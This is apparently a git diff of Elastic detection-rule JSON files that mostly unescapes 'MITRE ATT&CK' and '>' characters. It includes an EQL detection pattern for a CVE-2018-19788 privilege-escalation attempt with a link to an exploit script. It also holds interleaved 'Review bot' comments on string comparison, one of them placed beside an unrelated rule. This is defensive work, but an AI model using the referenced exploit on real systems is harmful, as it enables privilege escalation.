b/packages/security_detection_engine/kibana/security_rule/d461fac0-43e8-49e2-85ea-3a58fe120b4f_104.json index 594389ab939..4345ffa93c9 100644 --- a/packages/security_detection_engine/kibana/security_rule/d461fac0-43e8-49e2-85ea-3a58fe120b4f_104.json 
+++ b/packages/security_detection_engine/kibana/security_rule/d461fac0-43e8-49e2-85ea-3a58fe120b4f_104.json @@ -72,7 +72,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/d461fac0-43e8-49e2-85ea-3a58fe120b4f_105.json b/packages/security_detection_engine/kibana/security_rule/d461fac0-43e8-49e2-85ea-3a58fe120b4f_105.json index 5be3fd3893f..8f503d399a5 100644 --- a/packages/security_detection_engine/kibana/security_rule/d461fac0-43e8-49e2-85ea-3a58fe120b4f_105.json +++ b/packages/security_detection_engine/kibana/security_rule/d461fac0-43e8-49e2-85ea-3a58fe120b4f_105.json @@ -72,7 +72,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/d48e1c13-4aca-4d1f-a7b1-a9161c0ad86f_102.json b/packages/security_detection_engine/kibana/security_rule/d48e1c13-4aca-4d1f-a7b1-a9161c0ad86f_102.json index 4855af2abf3..d8265223d8f 100644 --- a/packages/security_detection_engine/kibana/security_rule/d48e1c13-4aca-4d1f-a7b1-a9161c0ad86f_102.json +++ b/packages/security_detection_engine/kibana/security_rule/d48e1c13-4aca-4d1f-a7b1-a9161c0ad86f_102.json @@ -54,7 +54,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0040", "name": "Impact", diff --git a/packages/security_detection_engine/kibana/security_rule/d48e1c13-4aca-4d1f-a7b1-a9161c0ad86f_103.json b/packages/security_detection_engine/kibana/security_rule/d48e1c13-4aca-4d1f-a7b1-a9161c0ad86f_103.json index 6a143b78790..4c92ad23700 100644 --- a/packages/security_detection_engine/kibana/security_rule/d48e1c13-4aca-4d1f-a7b1-a9161c0ad86f_103.json +++ b/packages/security_detection_engine/kibana/security_rule/d48e1c13-4aca-4d1f-a7b1-a9161c0ad86f_103.json 
@@ -50,7 +50,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0040", "name": "Impact", diff --git a/packages/security_detection_engine/kibana/security_rule/d48e1c13-4aca-4d1f-a7b1-a9161c0ad86f_104.json b/packages/security_detection_engine/kibana/security_rule/d48e1c13-4aca-4d1f-a7b1-a9161c0ad86f_104.json index 75fef25d9e0..516b6ea7de6 100644 --- a/packages/security_detection_engine/kibana/security_rule/d48e1c13-4aca-4d1f-a7b1-a9161c0ad86f_104.json +++ b/packages/security_detection_engine/kibana/security_rule/d48e1c13-4aca-4d1f-a7b1-a9161c0ad86f_104.json @@ -50,7 +50,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0040", "name": "Impact", diff --git a/packages/security_detection_engine/kibana/security_rule/d48e1c13-4aca-4d1f-a7b1-a9161c0ad86f_205.json b/packages/security_detection_engine/kibana/security_rule/d48e1c13-4aca-4d1f-a7b1-a9161c0ad86f_205.json index 390808e0445..51f9f61c4cf 100644 --- a/packages/security_detection_engine/kibana/security_rule/d48e1c13-4aca-4d1f-a7b1-a9161c0ad86f_205.json +++ b/packages/security_detection_engine/kibana/security_rule/d48e1c13-4aca-4d1f-a7b1-a9161c0ad86f_205.json @@ -50,7 +50,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0040", "name": "Impact", diff --git a/packages/security_detection_engine/kibana/security_rule/d4af3a06-1e0a-48ec-b96a-faf2309fae46_101.json b/packages/security_detection_engine/kibana/security_rule/d4af3a06-1e0a-48ec-b96a-faf2309fae46_101.json index 40ae0679730..86f3feb71b4 100644 --- a/packages/security_detection_engine/kibana/security_rule/d4af3a06-1e0a-48ec-b96a-faf2309fae46_101.json +++ b/packages/security_detection_engine/kibana/security_rule/d4af3a06-1e0a-48ec-b96a-faf2309fae46_101.json 
@@ -29,7 +29,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", diff --git a/packages/security_detection_engine/kibana/security_rule/d4af3a06-1e0a-48ec-b96a-faf2309fae46_102.json b/packages/security_detection_engine/kibana/security_rule/d4af3a06-1e0a-48ec-b96a-faf2309fae46_102.json index 42b3ce6f4a3..8d6e032a168 100644 --- a/packages/security_detection_engine/kibana/security_rule/d4af3a06-1e0a-48ec-b96a-faf2309fae46_102.json +++ b/packages/security_detection_engine/kibana/security_rule/d4af3a06-1e0a-48ec-b96a-faf2309fae46_102.json @@ -28,7 +28,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", diff --git a/packages/security_detection_engine/kibana/security_rule/d4af3a06-1e0a-48ec-b96a-faf2309fae46_103.json b/packages/security_detection_engine/kibana/security_rule/d4af3a06-1e0a-48ec-b96a-faf2309fae46_103.json index 7a270b6ea6a..225b15aea7a 100644 --- a/packages/security_detection_engine/kibana/security_rule/d4af3a06-1e0a-48ec-b96a-faf2309fae46_103.json +++ b/packages/security_detection_engine/kibana/security_rule/d4af3a06-1e0a-48ec-b96a-faf2309fae46_103.json @@ -38,7 +38,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", diff --git a/packages/security_detection_engine/kibana/security_rule/d4b73fa0-9d43-465e-b8bf-50230da6718b_101.json b/packages/security_detection_engine/kibana/security_rule/d4b73fa0-9d43-465e-b8bf-50230da6718b_101.json index 12348520778..1883bbdb77e 100644 --- a/packages/security_detection_engine/kibana/security_rule/d4b73fa0-9d43-465e-b8bf-50230da6718b_101.json +++ b/packages/security_detection_engine/kibana/security_rule/d4b73fa0-9d43-465e-b8bf-50230da6718b_101.json 
@@ -29,7 +29,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", diff --git a/packages/security_detection_engine/kibana/security_rule/d4b73fa0-9d43-465e-b8bf-50230da6718b_102.json b/packages/security_detection_engine/kibana/security_rule/d4b73fa0-9d43-465e-b8bf-50230da6718b_102.json index 1201e39827a..b88ba6515bd 100644 --- a/packages/security_detection_engine/kibana/security_rule/d4b73fa0-9d43-465e-b8bf-50230da6718b_102.json +++ b/packages/security_detection_engine/kibana/security_rule/d4b73fa0-9d43-465e-b8bf-50230da6718b_102.json @@ -28,7 +28,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", diff --git a/packages/security_detection_engine/kibana/security_rule/d4b73fa0-9d43-465e-b8bf-50230da6718b_103.json b/packages/security_detection_engine/kibana/security_rule/d4b73fa0-9d43-465e-b8bf-50230da6718b_103.json index c4c7c20f556..c81e4f836f5 100644 --- a/packages/security_detection_engine/kibana/security_rule/d4b73fa0-9d43-465e-b8bf-50230da6718b_103.json +++ b/packages/security_detection_engine/kibana/security_rule/d4b73fa0-9d43-465e-b8bf-50230da6718b_103.json @@ -42,7 +42,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", diff --git a/packages/security_detection_engine/kibana/security_rule/d4ff2f53-c802-4d2e-9fb9-9ecc08356c3f_1.json b/packages/security_detection_engine/kibana/security_rule/d4ff2f53-c802-4d2e-9fb9-9ecc08356c3f_1.json index d1fff9b12b5..787d1a2c97d 100644 --- a/packages/security_detection_engine/kibana/security_rule/d4ff2f53-c802-4d2e-9fb9-9ecc08356c3f_1.json +++ b/packages/security_detection_engine/kibana/security_rule/d4ff2f53-c802-4d2e-9fb9-9ecc08356c3f_1.json 
@@ -34,7 +34,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/d4ff2f53-c802-4d2e-9fb9-9ecc08356c3f_2.json b/packages/security_detection_engine/kibana/security_rule/d4ff2f53-c802-4d2e-9fb9-9ecc08356c3f_2.json index a1fe5e8231b..34c8ab82eb3 100644 --- a/packages/security_detection_engine/kibana/security_rule/d4ff2f53-c802-4d2e-9fb9-9ecc08356c3f_2.json +++ b/packages/security_detection_engine/kibana/security_rule/d4ff2f53-c802-4d2e-9fb9-9ecc08356c3f_2.json @@ -35,7 +35,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/d4ff2f53-c802-4d2e-9fb9-9ecc08356c3f_3.json b/packages/security_detection_engine/kibana/security_rule/d4ff2f53-c802-4d2e-9fb9-9ecc08356c3f_3.json index bb56431f87a..e75f3a8bd42 100644 --- a/packages/security_detection_engine/kibana/security_rule/d4ff2f53-c802-4d2e-9fb9-9ecc08356c3f_3.json +++ b/packages/security_detection_engine/kibana/security_rule/d4ff2f53-c802-4d2e-9fb9-9ecc08356c3f_3.json @@ -35,7 +35,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/d55436a8-719c-445f-92c4-c113ff2f9ba5_1.json b/packages/security_detection_engine/kibana/security_rule/d55436a8-719c-445f-92c4-c113ff2f9ba5_1.json index dd356a5a15a..e23b3e95760 100644 --- a/packages/security_detection_engine/kibana/security_rule/d55436a8-719c-445f-92c4-c113ff2f9ba5_1.json +++ b/packages/security_detection_engine/kibana/security_rule/d55436a8-719c-445f-92c4-c113ff2f9ba5_1.json 
@@ -11,7 +11,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Potential Privilege Escalation via UID INT_MAX Bug Detected", - "query": "process where host.os.type == \"linux\" and event.action == \"exec\" and event.type == \"start\" and \nprocess.name == \"systemd-run\" and process.args == \"-t\" and process.args_count \u003e= 3 and user.id \u003e= \"1000000000\"\n", + "query": "process where host.os.type == \"linux\" and event.action == \"exec\" and event.type == \"start\" and \nprocess.name == \"systemd-run\" and process.args == \"-t\" and process.args_count >= 3 and user.id >= \"1000000000\"\n", "references": [ "https://twitter.com/paragonsec/status/1071152249529884674", "https://github.com/mirchr/security-research/blob/master/vulnerabilities/CVE-2018-19788.sh", @@ -71,7 +71,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/d55436a8-719c-445f-92c4-c113ff2f9ba5_2.json b/packages/security_detection_engine/kibana/security_rule/d55436a8-719c-445f-92c4-c113ff2f9ba5_2.json index 7f5fae08cae..a43d3112d68 100644 --- a/packages/security_detection_engine/kibana/security_rule/d55436a8-719c-445f-92c4-c113ff2f9ba5_2.json +++ b/packages/security_detection_engine/kibana/security_rule/d55436a8-719c-445f-92c4-c113ff2f9ba5_2.json 
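Review bot: On the new side of the `@@ -11` hunk, `user.id >= "1000000000"` is a string comparison: ECS `user.id` is a keyword field, and a range on a keyword is ordered lexicographically, so UIDs such as `1001` or `65534` sort after `"1000000000"` and satisfy the predicate even though they are far below the INT_MAX bound that the rule name and the referenced CVE-2018-19788 describe. That widens the match to most non-root users running `systemd-run -t`, which is a false-positive risk rather than a detection gap, and the escape-only change in this commit does not alter the comparison semantics. Since the intent is a numeric bound, a length test expresses it with string semantics, e.g. `process.args_count >= 3 and length(user.id) >= 10` (EQL's `number()` conversion is an alternative if the deployed Elasticsearch version supports it). The same query appears in the d55436a8 _2, _3 and _4 sections on the following lines.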
@@ -11,7 +11,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Potential Privilege Escalation via UID INT_MAX Bug Detected", - "query": "process where host.os.type == \"linux\" and event.action == \"exec\" and event.type == \"start\" and \nprocess.name == \"systemd-run\" and process.args == \"-t\" and process.args_count \u003e= 3 and user.id \u003e= \"1000000000\"\n", + "query": "process where host.os.type == \"linux\" and event.action == \"exec\" and event.type == \"start\" and \nprocess.name == \"systemd-run\" and process.args == \"-t\" and process.args_count >= 3 and user.id >= \"1000000000\"\n", "references": [ "https://twitter.com/paragonsec/status/1071152249529884674", "https://github.com/mirchr/security-research/blob/master/vulnerabilities/CVE-2018-19788.sh", @@ -72,7 +72,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/d55436a8-719c-445f-92c4-c113ff2f9ba5_3.json b/packages/security_detection_engine/kibana/security_rule/d55436a8-719c-445f-92c4-c113ff2f9ba5_3.json index 940130be05d..64e392e6965 100644 --- a/packages/security_detection_engine/kibana/security_rule/d55436a8-719c-445f-92c4-c113ff2f9ba5_3.json +++ b/packages/security_detection_engine/kibana/security_rule/d55436a8-719c-445f-92c4-c113ff2f9ba5_3.json 
@@ -11,7 +11,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Potential Privilege Escalation via UID INT_MAX Bug Detected", - "query": "process where host.os.type == \"linux\" and event.action == \"exec\" and event.type == \"start\" and \nprocess.name == \"systemd-run\" and process.args == \"-t\" and process.args_count \u003e= 3 and user.id \u003e= \"1000000000\"\n", + "query": "process where host.os.type == \"linux\" and event.action == \"exec\" and event.type == \"start\" and \nprocess.name == \"systemd-run\" and process.args == \"-t\" and process.args_count >= 3 and user.id >= \"1000000000\"\n", "references": [ "https://twitter.com/paragonsec/status/1071152249529884674", "https://github.com/mirchr/security-research/blob/master/vulnerabilities/CVE-2018-19788.sh", @@ -73,7 +73,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/d55436a8-719c-445f-92c4-c113ff2f9ba5_4.json b/packages/security_detection_engine/kibana/security_rule/d55436a8-719c-445f-92c4-c113ff2f9ba5_4.json index b76d2ad7cbc..9e22b5f94e2 100644 --- a/packages/security_detection_engine/kibana/security_rule/d55436a8-719c-445f-92c4-c113ff2f9ba5_4.json +++ b/packages/security_detection_engine/kibana/security_rule/d55436a8-719c-445f-92c4-c113ff2f9ba5_4.json 
@@ -11,7 +11,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Potential Privilege Escalation via UID INT_MAX Bug Detected", - "query": "process where host.os.type == \"linux\" and event.action == \"exec\" and event.type == \"start\" and \nprocess.name == \"systemd-run\" and process.args == \"-t\" and process.args_count \u003e= 3 and user.id \u003e= \"1000000000\"\n", + "query": "process where host.os.type == \"linux\" and event.action == \"exec\" and event.type == \"start\" and \nprocess.name == \"systemd-run\" and process.args == \"-t\" and process.args_count >= 3 and user.id >= \"1000000000\"\n", "references": [ "https://twitter.com/paragonsec/status/1071152249529884674", "https://github.com/mirchr/security-research/blob/master/vulnerabilities/CVE-2018-19788.sh", @@ -73,7 +73,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/d563aaba-2e72-462b-8658-3e5ea22db3a6_102.json b/packages/security_detection_engine/kibana/security_rule/d563aaba-2e72-462b-8658-3e5ea22db3a6_102.json index 709c4e01ece..e602c200cba 100644 --- a/packages/security_detection_engine/kibana/security_rule/d563aaba-2e72-462b-8658-3e5ea22db3a6_102.json +++ b/packages/security_detection_engine/kibana/security_rule/d563aaba-2e72-462b-8658-3e5ea22db3a6_102.json @@ -52,7 +52,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/d563aaba-2e72-462b-8658-3e5ea22db3a6_103.json b/packages/security_detection_engine/kibana/security_rule/d563aaba-2e72-462b-8658-3e5ea22db3a6_103.json index 53779bc74c6..70f0a20d234 100644 --- a/packages/security_detection_engine/kibana/security_rule/d563aaba-2e72-462b-8658-3e5ea22db3a6_103.json 
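Review bot: The `user.id >= "1000000000"` clause on the new `query` line of this hunk is a string comparison, not a numeric one — `user.id` is an ECS keyword field, so EQL turns `>=` against a string literal into a lexicographic range over keyword terms. Under that ordering `"1001"`, `"2000"` or `"500"` all sort above `"1000000000"`, so an ordinary unprivileged user running `systemd-run -t …` satisfies the condition, while the CVE-2018-19788 trigger is specifically a uid above INT_MAX (2147483647). Consider `number(user.id) > 2147483647` (EQL's `number()` string-to-integer conversion; confirm it is available on the stack versions this rule targets), or at minimum `length(user.id) >= 10 and user.id >= "2147483648"`, which is equivalent to a numeric compare for fixed-width digit strings. The identical query appears in the `_2` and `_3` copies of this rule earlier in the diff, and presumably in the sibling whose header precedes this chunk; the enclosing rule object starts and ends outside the hunk. This commit only swaps the `\u003e` escape for a literal `>`, so the behaviour predates it and is worth a follow-up in the rule source rather than a fix in these generated files.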
+++ b/packages/security_detection_engine/kibana/security_rule/d563aaba-2e72-462b-8658-3e5ea22db3a6_103.json @@ -51,7 +51,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/d563aaba-2e72-462b-8658-3e5ea22db3a6_104.json b/packages/security_detection_engine/kibana/security_rule/d563aaba-2e72-462b-8658-3e5ea22db3a6_104.json index 921a158712c..34ae0cd7fde 100644 --- a/packages/security_detection_engine/kibana/security_rule/d563aaba-2e72-462b-8658-3e5ea22db3a6_104.json +++ b/packages/security_detection_engine/kibana/security_rule/d563aaba-2e72-462b-8658-3e5ea22db3a6_104.json @@ -52,7 +52,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/d5d86bf5-cf0c-4c06-b688-53fdc072fdfd_102.json b/packages/security_detection_engine/kibana/security_rule/d5d86bf5-cf0c-4c06-b688-53fdc072fdfd_102.json index ddf06557941..9f155c1d004 100644 --- a/packages/security_detection_engine/kibana/security_rule/d5d86bf5-cf0c-4c06-b688-53fdc072fdfd_102.json +++ b/packages/security_detection_engine/kibana/security_rule/d5d86bf5-cf0c-4c06-b688-53fdc072fdfd_102.json @@ -55,7 +55,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/d5d86bf5-cf0c-4c06-b688-53fdc072fdfd_103.json b/packages/security_detection_engine/kibana/security_rule/d5d86bf5-cf0c-4c06-b688-53fdc072fdfd_103.json index 8458e371cbc..8d782881017 100644 --- a/packages/security_detection_engine/kibana/security_rule/d5d86bf5-cf0c-4c06-b688-53fdc072fdfd_103.json 
+++ b/packages/security_detection_engine/kibana/security_rule/d5d86bf5-cf0c-4c06-b688-53fdc072fdfd_103.json @@ -51,7 +51,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/d5d86bf5-cf0c-4c06-b688-53fdc072fdfd_104.json b/packages/security_detection_engine/kibana/security_rule/d5d86bf5-cf0c-4c06-b688-53fdc072fdfd_104.json index b40470a9dea..2aa4203c544 100644 --- a/packages/security_detection_engine/kibana/security_rule/d5d86bf5-cf0c-4c06-b688-53fdc072fdfd_104.json +++ b/packages/security_detection_engine/kibana/security_rule/d5d86bf5-cf0c-4c06-b688-53fdc072fdfd_104.json @@ -51,7 +51,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/d5d86bf5-cf0c-4c06-b688-53fdc072fdfd_105.json b/packages/security_detection_engine/kibana/security_rule/d5d86bf5-cf0c-4c06-b688-53fdc072fdfd_105.json index b9c1a590137..59ede388de7 100644 --- a/packages/security_detection_engine/kibana/security_rule/d5d86bf5-cf0c-4c06-b688-53fdc072fdfd_105.json +++ b/packages/security_detection_engine/kibana/security_rule/d5d86bf5-cf0c-4c06-b688-53fdc072fdfd_105.json @@ -51,7 +51,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/d5d86bf5-cf0c-4c06-b688-53fdc072fdfd_206.json b/packages/security_detection_engine/kibana/security_rule/d5d86bf5-cf0c-4c06-b688-53fdc072fdfd_206.json index c586f33e7b4..2534abf8363 100644 --- a/packages/security_detection_engine/kibana/security_rule/d5d86bf5-cf0c-4c06-b688-53fdc072fdfd_206.json +++ b/packages/security_detection_engine/kibana/security_rule/d5d86bf5-cf0c-4c06-b688-53fdc072fdfd_206.json 
@@ -51,7 +51,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/d61cbcf8-1bc1-4cff-85ba-e7b21c5beedc_103.json b/packages/security_detection_engine/kibana/security_rule/d61cbcf8-1bc1-4cff-85ba-e7b21c5beedc_103.json index 7cadba3072b..af2558a5f0b 100644 --- a/packages/security_detection_engine/kibana/security_rule/d61cbcf8-1bc1-4cff-85ba-e7b21c5beedc_103.json +++ b/packages/security_detection_engine/kibana/security_rule/d61cbcf8-1bc1-4cff-85ba-e7b21c5beedc_103.json @@ -73,7 +73,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0008", "name": "Lateral Movement", @@ -88,7 +88,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", @@ -110,7 +110,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/d61cbcf8-1bc1-4cff-85ba-e7b21c5beedc_104.json b/packages/security_detection_engine/kibana/security_rule/d61cbcf8-1bc1-4cff-85ba-e7b21c5beedc_104.json index 606d4b59fb5..a5ae8d6551e 100644 --- a/packages/security_detection_engine/kibana/security_rule/d61cbcf8-1bc1-4cff-85ba-e7b21c5beedc_104.json +++ b/packages/security_detection_engine/kibana/security_rule/d61cbcf8-1bc1-4cff-85ba-e7b21c5beedc_104.json @@ -72,7 +72,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0008", "name": "Lateral Movement", @@ -87,7 +87,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", @@ -109,7 +109,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", 
diff --git a/packages/security_detection_engine/kibana/security_rule/d61cbcf8-1bc1-4cff-85ba-e7b21c5beedc_105.json b/packages/security_detection_engine/kibana/security_rule/d61cbcf8-1bc1-4cff-85ba-e7b21c5beedc_105.json index 8c767012043..ad74e29bf6c 100644 --- a/packages/security_detection_engine/kibana/security_rule/d61cbcf8-1bc1-4cff-85ba-e7b21c5beedc_105.json +++ b/packages/security_detection_engine/kibana/security_rule/d61cbcf8-1bc1-4cff-85ba-e7b21c5beedc_105.json @@ -73,7 +73,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0008", "name": "Lateral Movement", @@ -88,7 +88,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", @@ -110,7 +110,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/d624f0ae-3dd1-4856-9aad-ccfe4d4bfa17_105.json b/packages/security_detection_engine/kibana/security_rule/d624f0ae-3dd1-4856-9aad-ccfe4d4bfa17_105.json index 2616f6da75f..43ac52eb161 100644 --- a/packages/security_detection_engine/kibana/security_rule/d624f0ae-3dd1-4856-9aad-ccfe4d4bfa17_105.json +++ b/packages/security_detection_engine/kibana/security_rule/d624f0ae-3dd1-4856-9aad-ccfe4d4bfa17_105.json @@ -68,7 +68,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0040", "name": "Impact", @@ -83,7 +83,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/d624f0ae-3dd1-4856-9aad-ccfe4d4bfa17_106.json b/packages/security_detection_engine/kibana/security_rule/d624f0ae-3dd1-4856-9aad-ccfe4d4bfa17_106.json index 547cb75516e..2fca30e6ef4 100644 
--- a/packages/security_detection_engine/kibana/security_rule/d624f0ae-3dd1-4856-9aad-ccfe4d4bfa17_106.json +++ b/packages/security_detection_engine/kibana/security_rule/d624f0ae-3dd1-4856-9aad-ccfe4d4bfa17_106.json @@ -65,7 +65,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0040", "name": "Impact", @@ -80,7 +80,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/d624f0ae-3dd1-4856-9aad-ccfe4d4bfa17_107.json b/packages/security_detection_engine/kibana/security_rule/d624f0ae-3dd1-4856-9aad-ccfe4d4bfa17_107.json index f9e0b1d80ec..e1e06cd673c 100644 --- a/packages/security_detection_engine/kibana/security_rule/d624f0ae-3dd1-4856-9aad-ccfe4d4bfa17_107.json +++ b/packages/security_detection_engine/kibana/security_rule/d624f0ae-3dd1-4856-9aad-ccfe4d4bfa17_107.json @@ -65,7 +65,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0040", "name": "Impact", @@ -80,7 +80,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/d624f0ae-3dd1-4856-9aad-ccfe4d4bfa17_208.json b/packages/security_detection_engine/kibana/security_rule/d624f0ae-3dd1-4856-9aad-ccfe4d4bfa17_208.json index 4c5bf01428b..e736964fd61 100644 --- a/packages/security_detection_engine/kibana/security_rule/d624f0ae-3dd1-4856-9aad-ccfe4d4bfa17_208.json +++ b/packages/security_detection_engine/kibana/security_rule/d624f0ae-3dd1-4856-9aad-ccfe4d4bfa17_208.json @@ -65,7 +65,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0040", "name": "Impact", 
@@ -80,7 +80,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/d62b64a8-a7c9-43e5-aee3-15a725a794e7_104.json b/packages/security_detection_engine/kibana/security_rule/d62b64a8-a7c9-43e5-aee3-15a725a794e7_104.json index 8b89dc51c14..11f87cd7d97 100644 --- a/packages/security_detection_engine/kibana/security_rule/d62b64a8-a7c9-43e5-aee3-15a725a794e7_104.json +++ b/packages/security_detection_engine/kibana/security_rule/d62b64a8-a7c9-43e5-aee3-15a725a794e7_104.json @@ -58,7 +58,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0009", "name": "Collection", diff --git a/packages/security_detection_engine/kibana/security_rule/d62b64a8-a7c9-43e5-aee3-15a725a794e7_105.json b/packages/security_detection_engine/kibana/security_rule/d62b64a8-a7c9-43e5-aee3-15a725a794e7_105.json index db137b231a6..aa198832d91 100644 --- a/packages/security_detection_engine/kibana/security_rule/d62b64a8-a7c9-43e5-aee3-15a725a794e7_105.json +++ b/packages/security_detection_engine/kibana/security_rule/d62b64a8-a7c9-43e5-aee3-15a725a794e7_105.json @@ -56,7 +56,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0009", "name": "Collection", diff --git 